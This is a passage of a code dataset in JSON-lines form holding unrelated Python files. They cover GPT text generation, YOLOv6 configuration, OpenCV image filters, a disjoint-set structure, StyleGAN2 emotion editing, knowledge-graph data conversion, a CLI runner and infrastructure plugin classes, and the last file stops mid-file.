of tokens in generated text, if None (default), is\n determined by model hyperparameters\n :temperature=1 : Float value controlling randomness in boltzmann\n distribution. Lower temperature results in less random completions. As the\n temperature approaches zero, the model will become deterministic and\n repetitive. Higher temperature results in more random completions.\n :top_k=0 : Integer value controlling diversity. 1 means only 1 word is\n considered for each step (token), resulting in deterministic completions,\n while 40 means 40 words are considered at each step. 0 (default) is a\n special setting meaning no restrictions. 40 generally is a good value.\n :models_dir : path to parent folder containing model subfolders\n (i.e. contains the folder) \n \"\"\"\n models_dir = os.path.expanduser(os.path.expandvars(models_dir))\n\n enc = encoder.get_encoder(model_name, models_dir)\n \n behavior = DeviceBehavior(0).PredictMode\n\n max_seq = 256\n gpt = gpt_model(model_name, models_dir, behavior)\n\n lm = gpt_gen(enc, gpt.Models, max_seq, 64, 1, behavior)\n\n behavior.Setup()\n behavior.SetPredictMode()\n\n while True:\n raw_text = input(\"Input prompt >>> \")\n \n tokens = enc.encode(raw_text)\n tok_len = len(tokens)\n print(tokens, tok_len)\n\n tokens.extend([ gpt.Models['vocab'] - 1 for _ in range(max_seq - tok_len)])\n \n in_tok = torch.zeros([1, max_seq], dtype=torch.int32)\n in_tok[0] = torch.IntTensor(tokens)\n\n in_tok_len = torch.zeros([1], dtype=torch.int32)\n in_tok_len[0] = tok_len\n \n ans_tok, ans_len = lm.predict(in_tok, in_tok_len)\n \n #_tok = _ans_tokens[b]\n #_len = _ans_len[b]\n #print(_len, _tok[:_len])\n ans_tokens = ans_tok[0][:ans_len[0]].numpy()\n \n print(ans_tokens)\n\n _decode_text = enc.decode(ans_tokens)\n\n print(_decode_text)\n\n #lm.forward(in_tok, in_tok_len)\n #print('lm probability:', lm.loss.Value)\n #print('accuracy 1:', lm.acc[0] / lm.eff_size, 'accuracy 5:', lm.acc[1] / lm.eff_size)\n\n\nif __name__ == '__main__':\n interact_model()\n #fire.Fire(interact_model)\n\n","sub_path":"python/gpt_text_gen/gpt_lm_gen.py","file_name":"gpt_lm_gen.py","file_ext":"py","file_size_in_byte":16249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"103173225","text":"# YOLOv6n model\nmodel = dict(\n type='YOLOv6s6',\n pretrained=None,\n depth_multiple=0.33,\n width_multiple=0.50,\n backbone=dict(\n type='EfficientRep6',\n num_repeats=[1, 6, 12, 18, 6, 6],\n out_channels=[64, 128, 256, 512, 768, 1024],\n fuse_P2=True, # if use RepBiFPANNeck6, please set fuse_P2 to True.\n cspsppf=True,\n ),\n neck=dict(\n type='RepBiFPANNeck6',\n num_repeats=[12, 12, 12, 12, 12, 12],\n out_channels=[512, 256, 128, 256, 512, 1024],\n ),\n head=dict(\n type='EffiDeHead',\n in_channels=[128, 256, 512, 1024],\n num_layers=4,\n anchors=1,\n strides=[8, 16, 32, 64],\n atss_warmup_epoch=4,\n iou_type='giou',\n use_dfl=False,\n reg_max=0 #if use_dfl is False, please set reg_max to 0\n )\n)\n\nsolver = dict(\n optim='SGD',\n lr_scheduler='Cosine',\n lr0=0.01,\n lrf=0.01,\n momentum=0.937,\n weight_decay=0.0005,\n warmup_epochs=3.0,\n warmup_momentum=0.8,\n warmup_bias_lr=0.1\n)\n\ndata_aug = dict(\n hsv_h=0.015,\n hsv_s=0.7,\n hsv_v=0.4,\n degrees=0.0,\n translate=0.1,\n scale=0.5,\n shear=0.0,\n flipud=0.0,\n fliplr=0.5,\n mosaic=1.0,\n mixup=0.0,\n)\n","sub_path":"cv/detection/yolov6/pytorch/configs/yolov6s6.py","file_name":"yolov6s6.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"463206547","text":"import cv2, numpy\n\nclass ImageProcessor:\n def convert_colorspace(self, image, colorspace):\n try:\n image = cv2.cvtColor(image, colorspace)\n except cv2.error as e:\n print('Error throwed while trying to convert colorspace')\n\n return image\n\n def convert_bgr_to_rgb(self, image):\n im = image\n\n try:\n b, g, r = cv2.split(im)\n im = cv2.merge([r, g, b])\n except:\n return 'gray'\n\n image = im\n\n return None\n\n def convolute(self, image, kernel):\n kernel = numpy.asanyarray(kernel, numpy.float32)\n return cv2.filter2D(image, -1, kernel)\n\n def salt_and_pepper(self, image, amount):\n salt_vs_pepper = 0.5\n amount = float(amount) / 1000\n out = image\n\n # Salt mode\n num_salt = numpy.ceil(amount * image.size * salt_vs_pepper)\n coords = [numpy.random.randint(0, i - 1, int(num_salt)) for i in image.shape]\n out[coords] = 1\n\n # Pepper mode\n num_pepper = numpy.ceil(amount * image.size * (1.0 - salt_vs_pepper))\n coords = [numpy.random.randint(0, i - 1, int(num_pepper)) for i in image.shape]\n out[coords] = 0\n\n return out\n\n def high_pass(self, image, kernel_size=5):\n middle = numpy.ceil((kernel_size - 1) / 2)\n\n kernel = numpy.full((kernel_size, kernel_size), -1)\n kernel[middle][middle] = (kernel_size ** 2) - 1\n\n image = self.convert_colorspace(image, cv2.COLOR_RGB2GRAY)\n\n return self.convolute(image, kernel)\n\n # Low pass filter using average, also known as image blurring\n def average(self, image, kernel_size=5):\n return cv2.blur(image, (kernel_size, kernel_size))\n\n def median(self, image, kernel_size=5):\n return cv2.medianBlur(image, kernel_size)\n\n # Thresholding sets pixel value to predefined value if its greater than a threshold else it is assigned to another value\n # Adaptive thresholding was used with gaussian weights\n def binarization(self, image):\n image = self.convert_colorspace(image, cv2.COLOR_RGB2GRAY)\n return cv2.adaptiveThreshold(image, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 11, 2)\n\n # Sobel edge detection using, respectively, x and y order\n def sobel(self, image, ddepth = cv2.CV_64F, scale = 1, delta = 0):\n image = cv2.GaussianBlur(image, (5,5), 0)\n gray = self.convert_colorspace(image, cv2.COLOR_BGR2GRAY)\n\n # Gradient-X\n grad_x = cv2.Sobel(gray, ddepth, 1, 0, ksize = 5, scale = scale, delta = delta, borderType = cv2.BORDER_DEFAULT)\n # Gradient-Y\n grad_y = cv2.Sobel(gray, ddepth, 0, 1, ksize = 5, scale = scale, delta = delta, borderType = cv2.BORDER_DEFAULT)\n\n abs_grad_x = cv2.convertScaleAbs(grad_x) # converting back to uint8\n abs_grad_y = cv2.convertScaleAbs(grad_y)\n\n return cv2.addWeighted(abs_grad_x, 0.5, abs_grad_y, 0.5, 0)\n\n def prewitt(self, image):\n image = self.convert_colorspace(image, cv2.COLOR_BGR2GRAY)\n\n kernel_x = [[-1, -1, -1], [0, 0, 0], [1, 1, 1]]\n kernel_y = [[-1, 0, 1], [-1, 0, 1], [-1, 0, 1]]\n\n prewitt_x = self.convolute(image, kernel_x)\n prewitt_y = self.convolute(image, kernel_y)\n\n return cv2.addWeighted(prewitt_x, 0.5, prewitt_y, 0.5, 0)\n\n def roberts(self, image):\n image = self.convert_colorspace(image, cv2.COLOR_BGR2GRAY)\n\n kernel_x = [[1, 0], [0, -1]]\n kernel_y = [[0, 1], [-1, 0]]\n\n roberts_x = self.convolute(image, kernel_x)\n roberts_y = self.convolute(image, kernel_y)\n\n return cv2.addWeighted(roberts_x, 0.5, roberts_y, 0.5, 0)\n\n # Hough Line Transform for line detection\n def hough_lines(self, image):\n gray = self.convert_colorspace(image, cv2.COLOR_BGR2GRAY)\n\n edges = cv2.Canny(gray, 50, 150, apertureSize = 3)\n\n lines = cv2.HoughLines(edges, 0.7, numpy.pi/180, 200)\n for rho,theta in lines[0]:\n a = numpy.cos(theta)\n b = numpy.sin(theta)\n x_zero = a * rho\n y_zero = b * rho\n x_one = int(x_zero + 1000 * (-b))\n x_two = int(x_zero - 1000 * (-b))\n y_one = int(y_zero + 1000 * a)\n y_two = int(y_zero - 1000 * a)\n\n cv2.line(image, (x_one, y_one), (x_two, y_two), (0, 0 ,255), 2)\n\n return image\n\n # Hough Circle Transform for circles detection\n def hough_circles(self, image):\n image = self.convert_colorspace(image, cv2.COLOR_RGB2GRAY)\n\n image = cv2.GaussianBlur(image, (5,5), 0)\n\n cimage = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)\n\n circles = cv2.HoughCircles(image, cv2.cv.CV_HOUGH_GRADIENT, 1, 20, param1=50, param2=30, minRadius=0, maxRadius=100)\n circles = numpy.uint16(numpy.around(circles))\n for i in circles[0,:]:\n # draw the outer circle\n cv2.circle(cimage, (i[0], i[1]), i[2], (0, 255, 0), 2)\n # draw the center of the circle\n cv2.circle(cimage, (i[0], i[1]), 2, (0, 0, 255), 3)\n\n return cimage\n\n def horizontal(self, image):\n kernel = [[-1,-1,-1],[2,2,2],[-1,-1,-1]]\n return self.convolute(image, kernel)\n\n def vertical(self, image):\n kernel = [[-1,2,-1],[-1,2,-1],[-1,2,-1]]\n return self.apply_filter(kernel, image)\n\n def diagonal(self, image, diagonal='Main'):\n if diagonal == 'Main':\n kernel = [[-1,-1,2],[-1,2,-1],[2,-1,-1]]\n elif diagonal == 'Secondary':\n kernel = [[2,-1,-1],[-1,2,-1],[-1,-1,2]]\n\n return self.convolute(image, kernel)\n\n # Color detection/extraction\n def color_detection(self, image, color, r=10):\n hsv = self.convert_colorspace(image, cv2.COLOR_BGR2HSV)\n color = numpy.uint8([[color]])\n color = cv2.cvtColor(color, cv2.COLOR_BGR2HSV)\n\n # define color range\n lower = numpy.array([color[0][0][0] - r, 100, 100])\n upper = numpy.array([color[0][0][0] + r, 255, 255])\n\n # threshold the HSV image to get only desired colors\n mask = cv2.inRange(hsv, lower, upper)\n\n # bitwise AND mask and original image\n return cv2.bitwise_and(image, image, mask=mask)\n\n # Generate the energy map, filterType can be 's' for Sobel, or 'g' for Gabor filter. half_width is the half-size of the filter\n # ex: half_width = 3 means that the final size of the filter will be 3 * 2 + 1 = 7 pixels\n def generate_energy_map(self, image, filterType, half_width):\n if filterType == \"g\":\n kernel = cv2.getGaborKernel((half_width * 2 + 1, half_width * 2 + 1))\n gradient = cv2.filter2D(image, cv2.CV_32F, kernel, 2, 0, 3, 1)\n elif filterType == \"s\":\n gradient = cv2.Sobel(image, cv2.CV_32F, 1, 0, ksize=half_width * 2 + 1)\n\n return numpy.multiply(gradient, gradient)\n\n def seam_carving(self, originalIm, nbColsToRemove, filter = 's'):\n (rows, cols, depth) = originalIm.shape\n\n # half size of the filter used to generate the energy map\n half_filterw = 4\n\n originalImGray = self.convert_colorspace(originalIm, cv2.COLOR_RGB2GRAY);\n\n currentImage = originalIm\n currentImageGray = originalImGray\n\n # remove nbColsToRemove lines\n for iter in range(1, nbColsToRemove):\n # Generate the energy map\n energyMap = self.generate_energy_map(currentImageGray, filter, half_filterw)\n\n # borders removal\n energyMap = energyMap[:, half_filterw : -half_filterw]\n\n # Creation of the weight map\n costs = numpy.zeros_like(energyMap)\n\n # Initialize first line\n costs[0, :] = energyMap[0, :]\n\n # Propagate the best solution\n for i in range(1, rows):\n # min f(i, j) = gradient(i, j) + min ( f(i-1, j-1), f(i-1, j), f(i-1, j +1 ) )\n opt = numpy.minimum( costs[i-1, :-2], costs[i-1, 1:-1] )\n opt = numpy.minimum( costs[i-1, 2:], opt )\n costs[i, 1:-1] = energyMap[i, 1:-1] + opt\n costs[i, 0] = energyMap[i, 0] + numpy.min(costs[i-1, :2] )\n costs[i, -1] = energyMap[i, -1] + numpy.min(costs[i-1, -2:] )\n\n minPos = numpy.argmin(costs[-1, :])\n\n newColsNumber = energyMap.shape[1] - 1\n\n # Creation of the image matrix where the lowest-energy line has been removed (cut*)\n cutCosts = numpy.zeros( (rows, newColsNumber) )\n\n # The borders of cutImageGray and cutIm are not removed, therefore they are filterwidth * 2 larger\n cutImageGray = numpy.zeros( (rows, newColsNumber + half_filterw * 2), dtype=numpy.float32 )\n cutIm = numpy.zeros( (rows, newColsNumber + half_filterw * 2, depth), dtype=numpy.uint8 )\n\n # backtrack from the bottom to the top to select the lowest-energy line\n # minPos is the position of the lowest-energy pixel at the row i that is connected to\n # the lowest-energy path at rows i+1 and beyond\n minPos = 1 + numpy.argmin(costs[rows - 1, 1:-2], axis=0)\n\n for i in range(rows -1, 0, -1):\n # Special cases: at the last row, the path was on the left or right edges\n if minPos == 0:\n minPos = minPos + numpy.argmin( costs[i, 0 : 2] )\n elif minPos == newColsNumber-1:\n minPos = minPos + numpy.argmin( costs[i, -2 : -1] ) - 1\n # General case\n else:\n minPos = minPos + numpy.argmin( costs[i, minPos - 1 : minPos + 2] ) - 1\n # draw the lowest-energy path on the image and on the weight map, used to generate pretty pictures.\n # The pixels that are changed will be removed for the cut* images\n currentImage[i, minPos + half_filterw, :] = 0\n costs[i, minPos] = 0\n\n cutIm[i, :, :] = numpy.delete(currentImage[i, :, :], minPos + half_filterw, axis=0)\n cutCosts[i, :] = numpy.delete(costs[i, :], minPos, axis=0)\n cutImageGray[i, :] = numpy.delete(currentImageGray[i, :], minPos + half_filterw, axis=0)\n\n currentImage = cutIm\n currentImageGray = cutImageGray\n\n return currentImage\n\n def union(self, first_image, second_image):\n operand1 = self.convert_colorspace(first_image, cv2.COLOR_RGB2GRAY)\n operand2 = self.convert_colorspace(second_image, cv2.COLOR_RGB2GRAY)\n\n return cv2.bitwise_or(operand1, operand2)\n\n def intersection(self, first_image, second_image):\n operand1 = self.convert_colorspace(first_image, cv2.COLOR_RGB2GRAY)\n operand2 = self.convert_colorspace(second_image, cv2.COLOR_RGB2GRAY)\n\n return cv2.bitwise_and(operand1, operand2)\n\n def complement(self, image):\n operand1 = self.convert_colorspace(image, cv2.COLOR_RGB2GRAY)\n\n return cv2.bitwise_not(operand1)\n\n def difference(self, first_image, second_image):\n operand1 = self.convert_colorspace(first_image, cv2.COLOR_RGB2GRAY)\n operand2 = self.convert_colorspace(second_image, cv2.COLOR_RGB2GRAY)\n\n return cv2.subtract(operand1, operand2)\n","sub_path":"image_processor.py","file_name":"image_processor.py","file_ext":"py","file_size_in_byte":11229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"307967755","text":"'''Majority Element\r\nGiven an array of size n, find the majority element. The majority element is the element that appears more than ⌊ n/2 ⌋ times.\r\n\r\nYou may assume that the array is non-empty and the majority element always exist in the array.\r\n\r\nExample 1:\r\n\r\nInput: [3,2,3]\r\nOutput: 3\r\nExample 2:\r\n\r\nInput: [2,2,1,1,1,2,2]\r\nOutput: 2'''\r\nfrom typing import List\r\nclass Solution:\r\n def majorityElement(self, nums: List[int]) -> int:\r\n majordict = {}\r\n \r\n for val in nums:\r\n majordict[val] = majordict.get(val,0)+1\r\n if majordict[val] > len(nums)/2:\r\n return val","sub_path":"Leetcode/May2020_Problems/May6.py","file_name":"May6.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"380754780","text":"class DisjointSet(object):\r\n def __init__(self):\r\n self.data = []\r\n\r\n def make_set(self, obj):\r\n obj['parent'] = obj\r\n obj['rank'] = 0\r\n self.data.insert(0, obj)\r\n\r\n def find(self, obj):\r\n if obj['parent'] != obj:\r\n obj['parent'] = self.find(obj['parent'])\r\n return obj['parent']\r\n\r\n def union(self, obj1, obj2):\r\n set1 = self.find(obj1)\r\n set2 = self.find(obj2)\r\n if set1 == set2:\r\n return\r\n\r\n if set1['rank'] > set2['rank']:\r\n set2['parent'] = set1\r\n else:\r\n set1['parent'] = set2\r\n if set1['rank'] == set2['rank']:\r\n set2['rank'] += 1\r\n\r\n\r\n\r\n# class DisjointSet(object):\r\n# def __init__(self, size):\r\n# if (size <= 0):\r\n# raise Exception('Invalid size.')\r\n# self.size = size\r\n# self.parent = [None] * (size + 1)\r\n# self.rank = [None] * (size + 1)\r\n#\r\n# def make_set(self, obj):\r\n# self.parent[obj] = obj\r\n# self.rank[obj] = 0\r\n#\r\n# def find(self, obj):\r\n# if obj != self.parent[obj]:\r\n# self.parent[obj] = self.find(self.parent[obj])\r\n# return self.parent[obj]\r\n#\r\n# def union(self, obj1, obj2):\r\n# set1 = self.find(obj1)\r\n# set2 = self.find(obj2)\r\n# if set1 == set2:\r\n# return\r\n#\r\n# if self.rank[set1] > self.rank[set2]:\r\n# self.parent[set2] = set1\r\n# else:\r\n# self.parent[set1] = set2\r\n# if self.rank[set1] == self.rank[set2]:\r\n# self.rank[set2] += 1","sub_path":"algs/disjoint_set.py","file_name":"disjoint_set.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"101848573","text":"from tqdm import tqdm\nimport pickle\nimport sys\nimport os\nfrom pathlib import Path\n\n\nif len(sys.argv) < 2:\n print(f\"Usage: {sys.argv[0]} \")\n sys.exit()\n\ndb = sys.argv[1]\ndir_prefix = \"/home/uji300/OpenKE/benchmarks/\"\nefile = dir_prefix + db + \"/entity2id.txt\"\nrfile = dir_prefix + db + \"/relation2id.txt\"\n\n#entity2id.txt n-1.txt n-n.py n-n.txt relation2id.txt test2id_all.txt test2id.txt train2id.txt type_constrain.txt valid2id.txt\n\ntrain_file = dir_prefix + db + \"/train2id.txt\"\nvalid_file = dir_prefix + db + \"/valid2id.txt\"\ntest_file = dir_prefix + db + \"/test2id.txt\"\n\n\neid_to_fid = {}\nrid_to_rel = {}\nid_to_relation = {}\nid_to_entity = {}\n'''\nidfile = \"/var/scratch2/uji300/kbs/fb15k237-id-to-entity.tsv\"\nfbdict = {}\nwith open(idfile, \"r\") as fin:\n lines = fin.readlines()\n for line in tqdm(lines):\n cols = line.split(maxsplit=1)\n if len(cols) < 2:\n #print(line)\n continue\n key = cols[0]\n val = cols[1]\n fbdict[key] = val\n'''\n\ncnt = 0\nwith open(efile, \"r\")as fin:\n lines = fin.readlines()\n for line in tqdm(lines[1:]):\n fid = line.split()[0].rstrip()\n eid = line.split()[1].rstrip()\n id_to_entity[int(eid)] = fid\n\nwith open(rfile, \"r\") as fin:\n lines = fin.readlines()\n for line in tqdm(lines[1:]):\n cols = line.split(maxsplit=1)\n val = cols[0]\n key = cols[1]\n id_to_relation[int(key)] = val.rstrip()\n\ndef expand_file(name):\n for x in [\"train\", \"valid\", \"test\"]:\n if x in name:\n outname = result_dir + x + \".txt\"\n\n newlines = \"\"\n with open(name, \"r\") as fin:\n lines = fin.readlines()\n for line in lines[1:]:\n head = int(line.split()[0])\n tail = int(line.split()[1])\n rel = int(line.split()[2].rstrip())\n this_line = eid_to_fid[head] +\"\\t\"+rid_to_rel[rel]+\"\\t\"+eid_to_fid[tail]+\"\\n\"\n newlines += this_line\n #print(this_line)\n # make a new file with new lines\n with open(outname, \"w\") as fout:\n fout.write(newlines)\n\n#expand_file(train_file)\n#expand_file(valid_file)\n#expand_file(test_file)\nresult_dir='/var/scratch2/uji300/OpenKE-results/' + db + '/misc/' \nPath(result_dir).mkdir(parents=True, exist_ok=True)\n\nwith open(result_dir + db + '-id-to-entity.pkl', 'wb') as fout:\n pickle.dump(id_to_entity, fout, protocol = pickle.HIGHEST_PROTOCOL)\n\nwith open(result_dir + db + '-id-to-relation.pkl', 'wb') as fout:\n pickle.dump(id_to_relation, fout, protocol = pickle.HIGHEST_PROTOCOL)\n","sub_path":"convert_dataset.py","file_name":"convert_dataset.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"243453523","text":"'''\n103 - Ficha do Jogador.\n\nCreated by Renan Souza on 08/01/19.\nCopyright © 2019 All rights reserved.\n'''\n\ndef ficha(n='', g=0):\n\treturn f'O jogador: {n} fez {g} gol(s) no campeonato.'\n\n\n#Exit---------------------------------------------------\nprint('-' * 30)\nnome = str(input('Nome do Jogador: ')).strip().capitalize()\ngols = str(input('Número de Gols: '))\n\nif gols.isnumeric():\n\tgols = int(gols)\nelse:\n\tgols = 0\n\nif nome.strip() == ' ':\n\tprint(ficha(gols))\nelse:\n\tprint(ficha(nome, gols))\n","sub_path":"103.py","file_name":"103.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"152214462","text":"import pickle\nfrom pathlib import Path\nfrom typing import List, Tuple, Dict\n\nimport numpy as np\nimport tensorflow as tf\n\nimport dnnlib\nfrom .model import Generator\n\nBASE_DIR = Path.cwd() / '_pickles'\nPICKLED_GEN = BASE_DIR / 'stylegan2-ffhq-config-f.pkl'\nPICKLED_EMOTIONS_VECTORS = BASE_DIR / 'emotion_directions_in_latent_space.pkl'\n\n\nclass GeneratorWrapper:\n batch_size, random_noise, tf_session, Gs, generator, emotion_vectors, vectors \\\n = None, None, None, None, None, None, None\n\n def __init__(self, batch_size: int, random_noise: bool, vectors: Dict[int, Tuple[str, float]]):\n self.batch_size = batch_size\n self.random_noise = random_noise\n # Initialize the tensorflow session\n dnnlib.tflib.init_tf()\n self.tf_session = tf.get_default_session()\n self.vectors = vectors\n self.__start_generator(batch_size, random_noise)\n\n def restart_generator(self, batch_size: int, random_noise: bool):\n self.batch_size = batch_size\n self.random_noise = random_noise\n # Close and reinitialize the tensorflow session\n # self.tf_session.close()\n # dnnlib.tflib.init_tf()\n # self.tf_session = tf.get_default_session()\n self.__start_generator(batch_size, random_noise)\n\n def __start_generator(self, batch_size: int, random_noise: bool):\n with self.tf_session.as_default():\n # Load networks from weights file\n with open(PICKLED_GEN, \"rb\") as file:\n _, _, self.Gs = pickle.load(file)\n # Load emotion vectors\n with open(PICKLED_EMOTIONS_VECTORS, \"rb\") as file:\n self.emotion_vectors = pickle.load(file)\n # Initialize the generator\n self.generator = Generator(self.Gs, batch_size, random_noise)\n\n def get_latent_state(self, seed: int, truncation_psi: float = 0.5):\n \"\"\" Given a seed in the [0, 2^31-1] interval, produce a latent state \"\"\"\n random_state = np.random.RandomState(np.asarray(seed))\n latents = random_state.randn(1, self.Gs.input_shape[1])\n with self.tf_session.as_default():\n all_w = self.Gs.components.mapping.run(latents, None)\n average_latent = self.Gs.get_var(\"dlatent_avg\")\n return average_latent + (all_w - average_latent) * truncation_psi\n\n def get_latent_states(self, seeds: List[int], truncation_psi: float = 0.5):\n \"\"\" Given an array of seeds in the [0, 2^31-1] interval, produce an array of latent states \"\"\"\n random_state = np.random.RandomState(np.asarray(seeds[0]))\n latents = random_state.randn(1, self.Gs.input_shape[1])\n for seed in seeds[1:]:\n random_state.seed(seed)\n latent = random_state.randn(1, self.Gs.input_shape[1])\n latents = np.append(latents, latent, axis=0)\n with self.tf_session.as_default():\n all_w = self.Gs.components.mapping.run(latents, None)\n average_latent = self.Gs.get_var(\"dlatent_avg\")\n return average_latent + (all_w - average_latent) * truncation_psi\n\n def apply_vectors_to_latent(self, latent_state, vectors: List[Tuple[int, float]]):\n \"\"\" Apply emotions with provided multipliers \"\"\"\n latent_state = latent_state.reshape((latent_state.shape[0], 18 * 512))\n for (v_id, v_multiplier) in vectors:\n (v_effect, v_weight) = self.vectors[v_id]\n emotion_vector = self.emotion_vectors[f'neutral->{v_effect}']\n weighted_emotion_vector = emotion_vector * v_weight\n scaled_emotion_vector = weighted_emotion_vector * v_multiplier\n latent_state += scaled_emotion_vector\n return latent_state.reshape((latent_state.shape[0], 18, 512))\n\n def generate_from_latent(self, latent_state, add_padding: bool = True):\n \"\"\" Generate image of the provided latent state. Given that the latent state\n dimensions to not match batch size - a padding shall be added, and removed afterwards \"\"\"\n assert (latent_state.shape[0] <= self.batch_size and latent_state.shape[1:] == (18, 512))\n diff = self.batch_size - latent_state.shape[0]\n # In case batch size does not match - add padding\n if 0 < diff and add_padding:\n latent_state = np.append(latent_state, np.empty((diff, 18, 512)), axis=0)\n with self.tf_session.as_default():\n self.generator.set_dlatents(latent_state)\n img_array = self.generator.generate_images()\n self.generator.reset_dlatents()\n # In case a padding was added - remove random images\n if 0 < diff and add_padding:\n img_array = img_array[:latent_state.shape[0] - diff]\n return img_array\n\n def generate(self, seed: int, vectors: List[Tuple[int, float]] = None):\n \"\"\" Generation pipeline, make latent state from a seed, apply emotion vectors, and generate an image \"\"\"\n ls = self.get_latent_state(seed)\n if vectors:\n self.apply_vectors_to_latent(ls, vectors)\n return self.generate_from_latent(ls)\n","sub_path":"backend/encoder/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":5057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"597741349","text":"\nimport click\n\ntry:\n from pathlib import Path\nexcept ImportError:\n from pathlib2 import Path\n\n\n@click.command()\n@click.argument('script_filepath', type=click.Path(exists=True, file_okay=True, dir_okay=False))\n@click.argument('config_filepath', type=click.Path(exists=True, file_okay=True, dir_okay=False))\n@click.option('--manual_config_load', is_flag=True, help=\"Allow manual configuration file loading\")\n@click.option('--local_rank', type=int, default=0, help=\"Local process rank for distributed computations\")\ndef command(script_filepath, config_filepath, manual_config_load, local_rank):\n \"\"\"Method to run experiment (defined by a script file)\n\n Args:\n script_filepath (str): input script filepath\n config_filepath (str): input configuration filepath\n manual_config_load (bool): if True configuration file can be manually loaded using\n `py_config_runner.runner.setup_config` method.\n local_rank (int): local process rank for distributed computations.\n See https://pytorch.org/docs/stable/distributed.html#launch-utility\n \"\"\"\n\n # remove path to py_config_runner.py_config_runner module from sys.path\n # as it can interfere with user's modules: py_config_runner.utils (seen as utils) <--> utils.py (user's module)\n this_folder_path = Path(__file__).parent.as_posix()\n import sys\n if this_folder_path in sys.path:\n sys.path.remove(this_folder_path)\n\n from py_config_runner.runner import run_script\n\n run_script(script_filepath, config_filepath, manual_config_load=manual_config_load, local_rank=local_rank)\n\n\ndef print_script_filepath():\n # This is helpful to call the runner using other executables\n # Ex1. python -m launcher `py_config_runner_script` script.py config.py\n # Ex2. python -m torch.distributed.launch `py_config_runner_script` script.py config.py\n print(__file__)\n\n\nif __name__ == \"__main__\":\n command()\n","sub_path":"py_config_runner/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"59296509","text":"from django.core.exceptions import ObjectDoesNotExist\n\nfrom contractor.lib.config import getConfig\n\n\nclass ConfigPlugin( object ): # this is purley Read Only, if wiring is needed have to set it to the structure/foundation's config_values, and figure out a way to reload\n TSCRIPT_NAME = 'config'\n\n def __init__( self, target ):\n super().__init__()\n if isinstance( target, dict ):\n self.config = target\n else:\n self.config = getConfig( target )\n\n def getValues( self ):\n result = {}\n for key in self.config:\n result[ key ] = ( lambda key=key: self.config[ key ], None )\n\n return result\n\n def getFunctions( self ):\n result = {}\n\n return result\n\n def __reduce__( self ):\n return ( self.__class__, ( self.config, ) )\n\n\nclass FoundationPlugin( object ):\n TSCRIPT_NAME = 'foundation'\n\n def __init__( self, foundation ): # most of the time all that is needed is the locator, so we are going to cache that and only go get the object if other than locator is needed\n super().__init__()\n self._dirty_list = []\n if isinstance( foundation, tuple ):\n self._foundation = None\n self.foundation_class = foundation[0]\n self.foundation_pk = foundation[1]\n self.foundation_locator = foundation[2]\n\n else:\n self._foundation = foundation.subclass\n self.foundation_class = self._foundation.__class__\n self.foundation_pk = foundation.pk\n self.foundation_locator = foundation.locator\n\n self.value_map = self.foundation_class.getTscriptValues( True )\n self.function_map = self.foundation_class.getTscriptFunctions()\n\n @property\n def foundation( self ):\n if self._foundation is None:\n self._foundation = self.foundation_class.objects.get( pk=self.foundation_pk )\n\n return self._foundation\n\n def _setValue( self, name, val ):\n setter = self.value_map[ name ][1]\n setter( self.foundation, val )\n self._dirty_list.append( name )\n\n def getValues( self ):\n result = {}\n for key in self.value_map:\n getter = self.value_map[ key ][0]\n setter = self.value_map[ key ][1]\n if setter is not None:\n result[ key ] = ( lambda getter=getter: getter( self.foundation ), lambda val, name=key: self._setValue( name, val ) )\n else:\n result[ key ] = ( lambda getter=getter: getter( self.foundation ), None )\n\n result[ 'locator' ] = ( lambda: self.foundation_locator, None )\n\n return result\n\n def getFunctions( self ):\n result = {}\n for key in self.function_map:\n builder = self.function_map[ key ]\n result[ key ] = lambda builder=builder: builder( self.foundation )\n\n return result\n\n def __reduce__( self ):\n if self._foundation is not None and self._dirty_list:\n self._foundation.full_clean()\n self._foundation.save( update_fields=self._dirty_list )\n\n return ( self.__class__, ( ( self.foundation_class, self.foundation_pk, self.foundation_locator ), ) )\n\n\nclass ROFoundationPlugin( FoundationPlugin ):\n def __init__( self, foundation ):\n super().__init__( foundation )\n # the same as Foundation plugin, except we want read only value_map, so replace value_map with this and call it good\n self.value_map = self.foundation_class.getTscriptValues( False )\n\n\nclass StructurePlugin( object ): # ie: structure with some settable attributes, 'config' is structures (with the foundation merged in of course)\n TSCRIPT_NAME = 'structure'\n\n def __init__( self, structure ):\n super().__init__()\n self.structure = structure\n\n def getValues( self ):\n result = {}\n\n try:\n provisioning_interface = self.structure.foundation.interfaces.get( is_provisioning=True )\n except ObjectDoesNotExist:\n provisioning_interface = None\n\n try:\n provisioning_ip = self.structure.address_set.get( interface_name=provisioning_interface.name, sub_interface=None ) if provisioning_interface is not None else None\n except ObjectDoesNotExist:\n provisioning_ip = None\n\n result[ 'id' ] = ( lambda: self.structure.pk, None )\n result[ 'hostname' ] = ( lambda: self.structure.hostname, None )\n result[ 'provisioning_ip' ] = ( lambda: provisioning_ip.ip_address if provisioning_ip is not None else None, None )\n result[ 'provisioning_interface' ] = ( lambda: provisioning_interface if provisioning_interface is not None else None, None )\n\n return result\n\n def getFunctions( self ):\n result = {}\n\n return result\n\n\nclass ROStructurePlugin( StructurePlugin ): # curently Structure is RO, this is so we don't have to figure out what should be RO later\n def __init__( self, structure ):\n super().__init__( structure 